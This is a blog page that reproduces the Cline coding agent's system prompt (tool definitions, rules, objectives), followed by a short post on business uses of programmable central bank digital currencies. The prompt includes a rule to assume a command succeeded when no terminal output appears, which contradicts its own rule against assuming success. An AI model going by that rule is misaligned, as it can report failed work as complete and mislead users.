<link itemprop="mainEntityOfPage" href="https://zhuang-weiming.github.io/2024/11/18/Code-Robot-Agent-Key-Prompt/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="Weiming Zhuang">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Zhuang's Diary">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2024/11/18/Code-Robot-Agent-Key-Prompt/" class="post-title-link" itemprop="url">Code-Robot-Agent-Key-Prompt</a>
</h2>
<div class="post-meta-container">
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">Posted on</span>
<time title="Created: 2024-11-18 16:01:00 / Modified: 16:05:09" itemprop="dateCreated datePublished" datetime="2024-11-18T16:01:00+08:00">2024-11-18</time>
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p><a target="_blank" rel="noopener" href="https://github.com/cline/cline/blob/main/src/core/prompts/system.ts">https://github.com/cline/cline/blob/main/src/core/prompts/system.ts</a><br>IDE 中的自主编码代理-Autonomous coding agent,能够在每一步中在您的许可下创建/编辑文件、执行命令、使用浏览器等。Autonomous coding agent core prompts are here:</p>
<h2 id="Who-you-are"><a href="#Who-you-are" class="headerlink" title="Who you are"></a>Who you are</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You are Cline, a highly skilled software engineer with extensive knowledge in many programming languages, frameworks, design patterns, and best practices.</span><br></pre></td></tr></table></figure>
<h2 id="execute-command"><a href="#execute-command" class="headerlink" title="execute_command"></a>execute_command</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Description: Request to execute a CLI command on the system. Use this when you need to perform system operations or run specific commands to accomplish any step in the user's task. You must tailor your command to the user's system and provide a clear explanation of what the command does. Prefer to execute complex CLI commands over creating executable scripts, as they are more flexible and easier to run. Commands will be executed in the current working directory: ${cwd.toPosix()}</span><br><span class="line">Parameters:</span><br><span class="line">- command: (required) The CLI command to execute. This should be valid for the current operating system. Ensure the command is properly formatted and does not contain any harmful instructions.</span><br></pre></td></tr></table></figure>
<h2 id="read-file"><a href="#read-file" class="headerlink" title="read_file"></a>read_file</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Description: Request to read the contents of a file at the specified path. Use this when you need to examine the contents of an existing file you do not know the contents of, for example to analyze code, review text files, or extract information from configuration files. Automatically extracts raw text from PDF and DOCX files. May not be suitable for other types of binary files, as it returns the raw content as a string.</span><br><span class="line">Parameters:</span><br><span class="line">- path: (required) The path of the file to read (relative to the current working directory ${cwd.toPosix()})</span><br></pre></td></tr></table></figure>
<h2 id="write-to-file"><a href="#write-to-file" class="headerlink" title="write_to_file"></a>write_to_file</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Description: Request to write content to a file at the specified path. If the file exists, it will be overwritten with the provided content. If the file doesn't exist, it will be created. This tool will automatically create any directories needed to write the file.</span><br><span class="line">Parameters:</span><br><span class="line">- path: (required) The path of the file to write to (relative to the current working directory ${cwd.toPosix()})</span><br><span class="line">- content: (required) The content to write to the file. ALWAYS provide the COMPLETE intended content of the file, without any truncation or omissions. You MUST include ALL parts of the file, even if they haven't been modified.</span><br></pre></td></tr></table></figure>
<h2 id="search-files"><a href="#search-files" class="headerlink" title="search_files"></a>search_files</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Description: Request to perform a regex search across files in a specified directory, providing context-rich results. This tool searches for patterns or specific content across multiple files, displaying each match with encapsulating context.</span><br><span class="line">Parameters:</span><br><span class="line">- path: (required) The path of the directory to search in (relative to the current working directory ${cwd.toPosix()}). This directory will be recursively searched.</span><br><span class="line">- regex: (required) The regular expression pattern to search for. Uses Rust regex syntax.</span><br><span class="line">- file_pattern: (optional) Glob pattern to filter files (e.g., '*.ts' for TypeScript files). If not provided, it will search all files (*).</span><br></pre></td></tr></table></figure>
<h2 id="list-files"><a href="#list-files" class="headerlink" title="list_files"></a>list_files</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Description: Request to list files and directories within the specified directory. If recursive is true, it will list all files and directories recursively. If recursive is false or not provided, it will only list the top-level contents. Do not use this tool to confirm the existence of files you may have created, as the user will let you know if the files were created successfully or not.</span><br><span class="line">Parameters:</span><br><span class="line">- path: (required) The path of the directory to list contents for (relative to the current working directory ${cwd.toPosix()})</span><br><span class="line">- recursive: (optional) Whether to list files recursively. Use true for recursive listing, false or omit for top-level only.</span><br></pre></td></tr></table></figure>
<h2 id="list-code-definition-names"><a href="#list-code-definition-names" class="headerlink" title="list_code_definition_names"></a>list_code_definition_names</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Description: Request to list definition names (classes, functions, methods, etc.) used in source code files at the top level of the specified directory. This tool provides insights into the codebase structure and important constructs, encapsulating high-level concepts and relationships that are crucial for understanding the overall architecture.</span><br><span class="line">Parameters:</span><br><span class="line">- path: (required) The path of the directory (relative to the current working directory ${cwd.toPosix()}) to list top level source code definitions for.</span><br></pre></td></tr></table></figure>
<h2 id="browser-action"><a href="#browser-action" class="headerlink" title="browser_action"></a>browser_action</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">Description: Request to interact with a Puppeteer-controlled browser. Every action, except \`close\`, will be responded to with a screenshot of the browser's current state, along with any new console logs. You may only perform one browser action per message, and wait for the user's response including a screenshot and logs to determine the next action.</span><br><span class="line">-The sequence of actions **must always start with** launching the browser at a URL, and **must always end with** closing the browser. If you need to visit a new URL that is not possible to navigate to from the current webpage, you must first close the browser, then launch again at the new URL.</span><br><span class="line">-While the browser is active, only the \`browser_action\` tool can be used. No other tools should be called during this time. You may proceed to use other tools only after closing the browser. For example if you run into an error and need to fix a file, you must close the browser, then use other tools to make the necessary changes, then re-launch the browser to verify the result.</span><br><span class="line">-The browser window has a resolution of **900x600** pixels. When performing any click actions, ensure the coordinates are within this resolution range.</span><br><span class="line">-Before clicking on any elements such as icons, links, or buttons, you must consult the provided screenshot of the page to determine the coordinates of the element. The click should be targeted at the **center of the element**, not on its edges.</span><br><span class="line">Parameters:</span><br><span class="line">-action: (required) The action to perform. The available actions are:</span><br><span class="line"> * launch: Launch a new Puppeteer-controlled browser instance at the specified URL. This **must always be the first action**.</span><br><span class="line"> - Use with the \`url\` parameter to provide the URL.</span><br><span class="line"> - Ensure the URL is valid and includes the appropriate protocol (e.g. http://localhost:3000/page, file:///path/to/file.html, etc.)</span><br><span class="line"> * click: Click at a specific x,y coordinate.</span><br><span class="line"> - Use with the \`coordinate\` parameter to specify the location.</span><br><span class="line"> - Always click in the center of an element (icon, button, link, etc.) based on coordinates derived from a screenshot.</span><br><span class="line"> * type: Type a string of text on the keyboard. You might use this after clicking on a text field to input text.</span><br><span class="line"> - Use with the \`text\` parameter to provide the string to type.</span><br><span class="line"> * scroll_down: Scroll down the page by one page height.</span><br><span class="line"> * scroll_up: Scroll up the page by one page height.</span><br><span class="line"> * close: Close the Puppeteer-controlled browser instance. This **must always be the final browser action**.</span><br><span class="line"> - Example: \`<action>close</action>\`</span><br><span class="line">-url: (optional) Use this for providing the URL for the \`launch\` action.</span><br><span class="line"> * Example: <url>https://example.com</url></span><br><span class="line">-coordinate: (optional) The X and Y coordinates for the \`click\` action. Coordinates should be within the **900x600** resolution.</span><br><span class="line"> * Example: <coordinate>450,300</coordinate></span><br><span class="line">-text: (optional) Use this for providing the text for the \`type\` action.</span><br><span class="line"> * Example: <text>Hello, world!</text></span><br></pre></td></tr></table></figure>
<h2 id="ask-followup-question"><a href="#ask-followup-question" class="headerlink" title="ask_followup_question"></a>ask_followup_question</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Description: Ask the user a question to gather additional information needed to complete the task. This tool should be used when you encounter ambiguities, need clarification, or require more details to proceed effectively. It allows for interactive problem-solving by enabling direct communication with the user. Use this tool judiciously to maintain a balance between gathering necessary information and avoiding excessive back-and-forth.</span><br><span class="line">Parameters:</span><br><span class="line">- question: (required) The question to ask the user. This should be a clear, specific question that addresses the information you need.</span><br><span class="line">Usage:</span><br><span class="line"><ask_followup_question></span><br><span class="line"><question>Your question here</question></span><br><span class="line"></ask_followup_question></span><br></pre></td></tr></table></figure>
<h2 id="attempt-completion"><a href="#attempt-completion" class="headerlink" title="attempt_completion"></a>attempt_completion</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">Description: After each tool use, the user will respond with the result of that tool use, i.e. if it succeeded or failed, along with any reasons for failure. Once you've received the results of tool uses and can confirm that the task is complete, use this tool to present the result of your work to the user. Optionally you may provide a CLI command to showcase the result of your work. The user may respond with feedback if they are not satisfied with the result, which you can use to make improvements and try again.</span><br><span class="line">IMPORTANT NOTE: This tool CANNOT be used until you've confirmed from the user that any previous tool uses were successful. Failure to do so will result in code corruption and system failure. Before using this tool, you must ask yourself in <thinking></thinking> tags if you've confirmed from the user that any previous tool uses were successful. If not, then DO NOT use this tool.</span><br><span class="line">Parameters:</span><br><span class="line">- result: (required) The result of the task. Formulate this result in a way that is final and does not require further input from the user. Don't end your result with questions or offers for further assistance.</span><br><span class="line">- command: (optional) A CLI command to execute to show a live demo of the result to the user. For example, use \`open index.html\` to display a created html website, or \`open localhost:3000\` to display a locally running development server. But DO NOT use commands like \`echo\` or \`cat\` that merely print text. This command should be valid for the current operating system. Ensure the command is properly formatted and does not contain any harmful instructions.</span><br><span class="line"></span><br><span class="line"># Tool Use Examples</span><br><span class="line"></span><br><span class="line">## Example 1: Requesting to execute a command</span><br><span class="line"></span><br><span class="line"><execute_command></span><br><span class="line"><command>npm run dev</command></span><br><span class="line"></execute_command></span><br><span class="line"></span><br><span class="line">## Example 2: Requesting to write to a file</span><br><span class="line"></span><br><span class="line"><write_to_file></span><br><span class="line"><path>frontend-config.json</path></span><br><span class="line"><content></span><br><span class="line">{</span><br><span class="line"> "apiEndpoint": "https://api.example.com",</span><br><span class="line"> "theme": {</span><br><span class="line"> "primaryColor": "#007bff",</span><br><span class="line"> "secondaryColor": "#6c757d",</span><br><span class="line"> "fontFamily": "Arial, sans-serif"</span><br><span class="line"> },</span><br><span class="line"> "features": {</span><br><span class="line"> "darkMode": true,</span><br><span class="line"> "notifications": true,</span><br><span class="line"> "analytics": false</span><br><span class="line"> },</span><br><span class="line"> "version": "1.0.0"</span><br><span class="line">}</span><br><span class="line"></content></span><br><span class="line"></write_to_file></span><br></pre></td></tr></table></figure>
<h1 id="Tool-Use-Guidelines"><a href="#Tool-Use-Guidelines" class="headerlink" title="Tool Use Guidelines"></a>Tool Use Guidelines</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">1 In <thinking> tags, assess what information you already have and what information you need to proceed with the task.</span><br><span class="line">2. Choose the most appropriate tool based on the task and the tool descriptions provided. Assess if you need additional information to proceed, and which of the available tools would be most effective for gathering this information. For example using the list_files tool is more effective than running a command like \`ls\` in the terminal. It's critical that you think about each available tool and use the one that best fits the current step in the task.</span><br><span class="line">3. If multiple actions are needed, use one tool at a time per message to accomplish the task iteratively, with each tool use being informed by the result of the previous tool use. Do not assume the outcome of any tool use. Each step must be informed by the previous step's result.</span><br><span class="line">4. Formulate your tool use using the XML format specified for each tool.</span><br><span class="line">5. After each tool use, the user will respond with the result of that tool use. This result will provide you with the necessary information to continue your task or make further decisions. This response may include:</span><br><span class="line"> - Information about whether the tool succeeded or failed, along with any reasons for failure.</span><br><span class="line"> - Linter errors that may have arisen due to the changes you made, which you'll need to address.</span><br><span class="line"> - New terminal output in reaction to the changes, which you may need to consider or act upon.</span><br><span class="line"> - Any other relevant feedback or information related to the tool use.</span><br><span class="line">6. ALWAYS wait for user confirmation after each tool use before proceeding. Never assume the success of a tool use without explicit confirmation of the result from the user.</span><br><span class="line"></span><br><span class="line">It is crucial to proceed step-by-step, waiting for the user's message after each tool use before moving forward with the task. This approach allows you to:</span><br><span class="line">1. Confirm the success of each step before proceeding.</span><br><span class="line">2. Address any issues or errors that arise immediately.</span><br><span class="line">3. Adapt your approach based on new information or unexpected results.</span><br><span class="line">4. Ensure that each action builds correctly on the previous ones.</span><br><span class="line"></span><br><span class="line">By waiting for and carefully considering the user's response after each tool use, you can react accordingly and make informed decisions about how to proceed with the task. This iterative process helps ensure the overall success and accuracy of your work.</span><br></pre></td></tr></table></figure>
<h2 id="CAPABILITIES"><a href="#CAPABILITIES" class="headerlink" title="CAPABILITIES"></a>CAPABILITIES</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">-You have access to tools that let you execute CLI commands on the user's computer, list files, view source code definitions, regex search${</span><br><span class="line"> supportsComputerUse ? ", use the browser" : ""</span><br><span class="line">}, read and write files, and ask follow-up questions. These tools help you effectively accomplish a wide range of tasks, such as writing code, making edits or improvements to existing files, understanding the current state of a project, performing system operations, and much more.</span><br><span class="line">- When the user initially gives you a task, a recursive list of all filepaths in the current working directory ('${cwd.toPosix()}') will be included in environment_details. This provides an overview of the project's file structure, offering key insights into the project from directory/file names (how developers conceptualize and organize their code) and file extensions (the language used). This can also guide decision-making on which files to explore further. If you need to further explore directories such as outside the current working directory, you can use the list_files tool. If you pass 'true' for the recursive parameter, it will list files recursively. Otherwise, it will list files at the top level, which is better suited for generic directories where you don't necessarily need the nested structure, like the Desktop.</span><br><span class="line">- You can use search_files to perform regex searches across files in a specified directory, outputting context-rich results that include surrounding lines. This is particularly useful for understanding code patterns, finding specific implementations, or identifying areas that need refactoring.</span><br><span class="line">- You can use the list_code_definition_names tool to get an overview of source code definitions for all files at the top level of a specified directory. This can be particularly useful when you need to understand the broader context and relationships between certain parts of the code. You may need to call this tool multiple times to understand various parts of the codebase related to the task.</span><br><span class="line"> - For example, when asked to make edits or improvements you might analyze the file structure in the initial environment_details to get an overview of the project, then use list_code_definition_names to get further insight using source code definitions for files located in relevant directories, then read_file to examine the contents of relevant files, analyze the code and suggest improvements or make necessary edits, then use the write_to_file tool to implement changes. If you refactored code that could affect other parts of the codebase, you could use search_files to ensure you update other files as needed.</span><br><span class="line">- You can use the execute_command tool to run commands on the user's computer whenever you feel it can help accomplish the user's task. When you need to execute a CLI command, you must provide a clear explanation of what the command does. Prefer to execute complex CLI commands over creating executable scripts, since they are more flexible and easier to run. Interactive and long-running commands are allowed, since the commands are run in the user's VSCode terminal. The user may keep commands running in the background and you will be kept updated on their status along the way. Each command you execute is run in a new terminal instance.${</span><br><span class="line"> supportsComputerUse</span><br><span class="line"> ? "\n- You can use the browser_action tool to interact with websites (including html files and locally running development servers) through a Puppeteer-controlled browser when you feel it is necessary in accomplishing the user's task. This tool is particularly useful for web development tasks as it allows you to launch a browser, navigate to pages, interact with elements through clicks and keyboard input, and capture the results through screenshots and console logs. This tool may be useful at key stages of web development tasks-such as after implementing new features, making substantial changes, when troubleshooting issues, or to verify the result of your work. You can analyze the provided screenshots to ensure correct rendering or identify errors, and review console logs for runtime issues.\n - For example, if asked to add a component to a react website, you might create the necessary files, use execute_command to run the site locally, then use browser_action to launch the browser, navigate to the local server, and verify the component renders & functions correctly before closing the browser."</span><br><span class="line"> : ""</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h2 id="RULES"><a href="#RULES" class="headerlink" title="RULES"></a>RULES</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">- Your current working directory is: ${cwd.toPosix()}</span><br><span class="line">- You cannot \`cd\` into a different directory to complete a task. You are stuck operating from '${cwd.toPosix()}', so be sure to pass in the correct 'path' parameter when using tools that require a path.</span><br><span class="line">- Do not use the ~ character or $HOME to refer to the home directory.</span><br><span class="line">- Before using the execute_command tool, you must first think about the SYSTEM INFORMATION context provided to understand the user's environment and tailor your commands to ensure they are compatible with their system. You must also consider if the command you need to run should be executed in a specific directory outside of the current working directory '${cwd.toPosix()}', and if so prepend with \`cd\`'ing into that directory && then executing the command (as one command since you are stuck operating from '${cwd.toPosix()}'). For example, if you needed to run \`npm install\` in a project outside of '${cwd.toPosix()}', you would need to prepend with a \`cd\` i.e. pseudocode for this would be \`cd (path to project) && (command, in this case npm install)\`.</span><br><span class="line">- When using the search_files tool, craft your regex patterns carefully to balance specificity and flexibility. Based on the user's task you may use it to find code patterns, TODO comments, function definitions, or any text-based information across the project. The results include context, so analyze the surrounding code to better understand the matches. Leverage the search_files tool in combination with other tools for more comprehensive analysis. For example, use it to find specific code patterns, then use read_file to examine the full context of interesting matches before using write_to_file to make informed changes.</span><br><span class="line">- When creating a new project (such as an app, website, or any software project), organize all new files within a dedicated project directory unless the user specifies otherwise. Use appropriate file paths when writing files, as the write_to_file tool will automatically create any necessary directories. Structure the project logically, adhering to best practices for the specific type of project being created. Unless otherwise specified, new projects should be easily run without additional setup, for example most projects can be built in HTML, CSS, and JavaScript - which you can open in a browser.</span><br><span class="line">- Be sure to consider the type of project (e.g. Python, JavaScript, web application) when determining the appropriate structure and files to include. Also consider what files may be most relevant to accomplishing the task, for example looking at a project's manifest file would help you understand the project's dependencies, which you could incorporate into any code you write.</span><br><span class="line">- When making changes to code, always consider the context in which the code is being used. Ensure that your changes are compatible with the existing codebase and that they follow the project's coding standards and best practices.</span><br><span class="line">- When you want to modify a file, use the write_to_file tool directly with the desired content. You do not need to display the content before using the tool.</span><br><span class="line">- Do not ask for more information than necessary. Use the tools provided to accomplish the user's request efficiently and effectively. When you've completed your task, you must use the attempt_completion tool to present the result to the user. The user may provide feedback, which you can use to make improvements and try again.</span><br><span class="line">- You are only allowed to ask the user questions using the ask_followup_question tool. Use this tool only when you need additional details to complete a task, and be sure to use a clear and concise question that will help you move forward with the task. However if you can use the available tools to avoid having to ask the user questions, you should do so. For example, if the user mentions a file that may be in an outside directory like the Desktop, you should use the list_files tool to list the files in the Desktop and check if the file they are talking about is there, rather than asking the user to provide the file path themselves.</span><br><span class="line">- When executing commands, if you don't see the expected output, assume the terminal executed the command successfully and proceed with the task. The user's terminal may be unable to stream the output back properly. If you absolutely need to see the actual terminal output, use the ask_followup_question tool to request the user to copy and paste it back to you.</span><br><span class="line">- The user may provide a file's contents directly in their message, in which case you shouldn't use the read_file tool to get the file contents again since you already have it.</span><br><span class="line">- Your goal is to try to accomplish the user's task, NOT engage in a back and forth conversation.${</span><br><span class="line"> supportsComputerUse</span><br><span class="line"> ? '\n- The user may ask generic non-development tasks, such as "what\'s the latest news" or "look up the weather in San Diego", in which case you might use the browser_action tool to complete the task if it makes sense to do so, rather than trying to create a website or using curl to answer the question.'</span><br><span class="line"> : ""</span><br><span class="line">}</span><br><span class="line">- NEVER end attempt_completion result with a question or request to engage in further conversation! Formulate the end of your result in a way that is final and does not require further input from the user.</span><br><span class="line">- You are STRICTLY FORBIDDEN from starting your messages with "Great", "Certainly", "Okay", "Sure". You should NOT be conversational in your responses, but rather direct and to the point. For example you should NOT say "Great, I've updated the CSS" but instead something like "I've updated the CSS". It is important you be clear and technical in your messages.</span><br><span class="line">- When presented with images, utilize your vision capabilities to thoroughly examine them and extract meaningful information. Incorporate these insights into your thought process as you accomplish the user's task.</span><br><span class="line">- At the end of each user message, you will automatically receive environment_details. This information is not written by the user themselves, but is auto-generated to provide potentially relevant context about the project structure and environment. While this information can be valuable for understanding the project context, do not treat it as a direct part of the user's request or response. Use it to inform your actions and decisions, but don't assume the user is explicitly asking about or referring to this information unless they clearly do so in their message. When using environment_details, explain your actions clearly to ensure the user understands, as they may not be aware of these details.</span><br><span class="line">- Before executing commands, check the "Actively Running Terminals" section in environment_details. If present, consider how these active processes might impact your task. For example, if a local development server is already running, you wouldn't need to start it again. If no active terminals are listed, proceed with command execution as normal.</span><br><span class="line">- When using the write_to_file tool, ALWAYS provide the COMPLETE file content in your response. This is NON-NEGOTIABLE. Partial updates or placeholders like '// rest of code unchanged' are STRICTLY FORBIDDEN. You MUST include ALL parts of the file, even if they haven't been modified. Failure to do so will result in incomplete or broken code, severely impacting the user's project.</span><br><span class="line">- It is critical you wait for the user's response after each tool use, in order to confirm the success of the tool use. For example, if asked to make a todo app, you would create a file, wait for the user's response it was created successfully, then create another file if needed, wait for the user's response it was created successfully, etc.${</span><br><span class="line"> supportsComputerUse</span><br><span class="line"> ? " Then if you want to test your work, you might use browser_action to launch the site, wait for the user's response confirming the site was launched along with a screenshot, then perhaps e.g., click a button to test functionality if needed, wait for the user's response confirming the button was clicked along with a screenshot of the new state, before finally closing the browser."</span><br><span class="line"> : ""</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>OBJECTIVE</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">You accomplish a given task iteratively, breaking it down into clear steps and working through them methodically.</span><br><span class="line"></span><br><span class="line">1. Analyze the user's task and set clear, achievable goals to accomplish it. Prioritize these goals in a logical order.</span><br><span class="line">2. Work through these goals sequentially, utilizing available tools one at a time as necessary. Each goal should correspond to a distinct step in your problem-solving process. You will be informed on the work completed and what's remaining as you go.</span><br><span class="line">3. Remember, you have extensive capabilities with access to a wide range of tools that can be used in powerful and clever ways as necessary to accomplish each goal. Before calling a tool, do some analysis within <thinking></thinking> tags. First, analyze the file structure provided in environment_details to gain context and insights for proceeding effectively. Then, think about which of the provided tools is the most relevant tool to accomplish the user's task. Next, go through each of the required parameters of the relevant tool and determine if the user has directly provided or given enough information to infer a value. When deciding if the parameter can be inferred, carefully consider all the context to see if it supports a specific value. If all of the required parameters are present or can be reasonably inferred, close the thinking tag and proceed with the tool use. BUT, if one of the values for a required parameter is missing, DO NOT invoke the tool (not even with fillers for the missing params) and instead, ask the user to provide the missing parameters using the ask_followup_question tool. DO NOT ask for more information on optional parameters if it is not provided.</span><br><span class="line">4. Once you've completed the user's task, you must use the attempt_completion tool to present the result of the task to the user. You may also provide a CLI command to showcase the result of your task; this can be particularly useful for web development tasks, where you can run e.g. \`open index.html\` to show the website you've built.</span><br><span class="line">5. The user may provide feedback, which you can use to make improvements and try again. But DO NOT continue in pointless back and forth conversations, i.e. don't end your responses with questions or offers for further assistance.`</span><br><span class="line"></span><br><span class="line">export function addCustomInstructions(customInstructions: string): string {</span><br><span class="line"> return `</span><br></pre></td></tr></table></figure>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
</div>
<div class="post-block">
<article itemscope itemtype="http://schema.org/Article" class="post-content" lang="">
<link itemprop="mainEntityOfPage" href="https://zhuang-weiming.github.io/2024/11/11/%E5%A4%AE%E8%A1%8C%E6%95%B0%E5%AD%97%E8%B4%A7%E5%B8%81%E7%9A%84%E5%8F%AF%E7%BC%96%E7%A8%8B%E6%80%A7%E5%88%B0%E5%BA%95%E5%8F%AF%E4%BB%A5%E5%81%9A%E4%BB%80%E4%B9%88/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="Weiming Zhuang">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Zhuang's Diary">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2024/11/11/%E5%A4%AE%E8%A1%8C%E6%95%B0%E5%AD%97%E8%B4%A7%E5%B8%81%E7%9A%84%E5%8F%AF%E7%BC%96%E7%A8%8B%E6%80%A7%E5%88%B0%E5%BA%95%E5%8F%AF%E4%BB%A5%E5%81%9A%E4%BB%80%E4%B9%88/" class="post-title-link" itemprop="url">央行数字货币的可编程性到底可以做什么</a>
</h2>
<div class="post-meta-container">
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">Posted on</span>
<time title="Created: 2024-11-11 11:11:00" itemprop="dateCreated datePublished" datetime="2024-11-11T11:11:00+08:00">2024-11-11</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">Edited on</span>
<time title="Modified: 2024-11-21 22:51:03" itemprop="dateModified" datetime="2024-11-21T22:51:03+08:00">2024-11-21</time>
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>Programmability in the context of Central Bank Digital Currencies (CBDCs) refers to the capacity to embed smart contract-like features directly into the digital currency. This would allow CBDCs to automatically execute rules or conditions when specific criteria are met, enabling more advanced use cases and controls.<br>Here are some practical <strong>business cases</strong> where the programmability of CBDCs could have significant impact:</p>
<p><strong>1. Supply Chain Finance and Trade Settlement</strong><br>供应链金融和贸易结算<br>In supply chain finance, CBDCs could be programmed to release payments automatically at each stage of production or delivery. For example:<br>• <em>Smart Contracts for Automatic Payment</em>: A CBDC could be programmed to release funds when a shipment reaches a specific location or when an IoT-enabled device confirms the delivery of goods.<br>• <em>International Trade Compliance</em>: By incorporating compliance checks within the CBDC, customs duties and taxes could be deducted automatically, while ensuring adherence to trade regulations, improving speed, and reducing paperwork.</p>
<p><strong>2. Conditional Government Aid and Welfare Programs</strong><br>有条件的政府援助和福利计划<br>Governments can disburse funds directly through programmable CBDCs with built-in conditions for usage. This use case would:<br>• <em>Ensure Targeted Spending</em>: Welfare payments could be restricted to authorized merchants or for specific categories (e.g., groceries, health services), reducing misuse and ensuring assistance reaches the intended recipients.<br>• <em>Automatic Expiration or Limits</em>: To encourage timely spending, certain stimulus payments could have expiration dates or be programmed to prevent hoarding, boosting economic activity.</p>
<p><strong>3. Automated Tax Collection for Businesses and Consumers</strong><br>企业和消费者自动征税<br>For businesses, CBDCs can simplify tax compliance through automated deductions:<br>• <em>Real-Time Tax Deduction</em>: Taxes could be deducted in real-time during each transaction, simplifying tax compliance and reducing the administrative burden for small businesses.<br>• <em>VAT and Sales Tax</em>: CBDCs could automatically calculate and remit VAT or sales tax directly to government accounts, reducing errors and ensuring compliance.</p>
